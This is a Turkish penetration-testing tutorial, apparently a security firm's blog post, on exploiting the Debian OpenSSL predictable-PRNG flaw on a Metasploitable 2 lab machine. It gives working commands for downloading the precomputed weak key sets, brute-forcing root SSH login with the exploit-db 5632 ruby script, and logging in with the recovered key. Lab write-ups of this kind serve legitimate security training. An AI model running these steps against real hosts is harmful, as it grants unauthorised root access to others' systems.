Elde Edilen SSH Özel Anahtarları ile OpenSSL Zafiyeti Olan Linux Bilgisayarlara Komut Satırı Bağlantısının Elde Edilmesi

0
847
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Metasploitable 2 işletim sisteminde yüklü olan OpenSSL kütüphanesindeki zafiyet Exploit-db üzerindeki bir betik ve bazı SSH özel anahtarları ile istismar edilecek ve Linux bilgisayarın SSH servisine erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Metasploitable 2 üzerindeki OpenSSL sürümü 0.9.8g olduğu görülmektedir.

openssl version

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-01

 

Bu sürüme ait bir çok zafiyet bulunmaktadır.

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-02

 

Bunlardan birisi de OpenSSL kütüphanesinin rastgele sayı üreticindeki “OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) – Predictable PRNG Brute Force SSH” isimli bir zafiyettir. Bu zafiyet ile zayıf / tahmin edilebilir sayılar üretilmektedir. Zafiyete istismar kodu exploit-db üzerinde bulunabilir.

https://www.exploit-db.com/exploits/5632/

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-03

 

Zafiyet ile ilgili detay için g0tmi1k’in Github yazısı incelenebilir:

https://github.com/g0tmi1k/debian-ssh

 

Ortak kullanılan anahtarlar belirtilen bağlantıdan indirilir.

DSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2
RSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

 

İndirilen sıkıştırılmış dosyalar dışarıya çıkarılır.

ls -la
ls -la rsa/2048 | more

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-04

 

İndirilen 5632 ruby betiği kullanılarak 192.168.5.106 IP adresli Metasploitable 2 bilgisayarın SSH servisine root kullanıcısı verilerek SSH özel anahtarları ile kaba kuvvet saldırısı gerçekleştirilir.

ruby ./5632.rb 192.168.5.106 root ./rsa/2048

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-05

 

Not: SSH anahtarı (/Ev_Dizini/.ssh/authorized_keys) bir şekilde elde edildiyse, herhangi bir betik kullanılmadan da ilgili anahtar tespit edilebilirdi.

grep -lr <Anahtar> ./rsa/2048/*.pub

 

SSH özel anahtarı tespit edilmiştir.

cat rsa/2048/57c3115d77c56390332dc5c49978627a-5429

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-06

 

Tespit edilen SSH özel anahtarı kullanılarak root kullanıcısı ile oturum açılabilir.

ssh root@192.168.5.106 -i 57c3115d77c56390332dc5c49978627a-5429

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-07

 

Belirtilen / benzer zafiyetin (5720) bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:

  • pWnOS: 1.0: https://www.vulnhub.com/entry/pwnos-10,33/

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.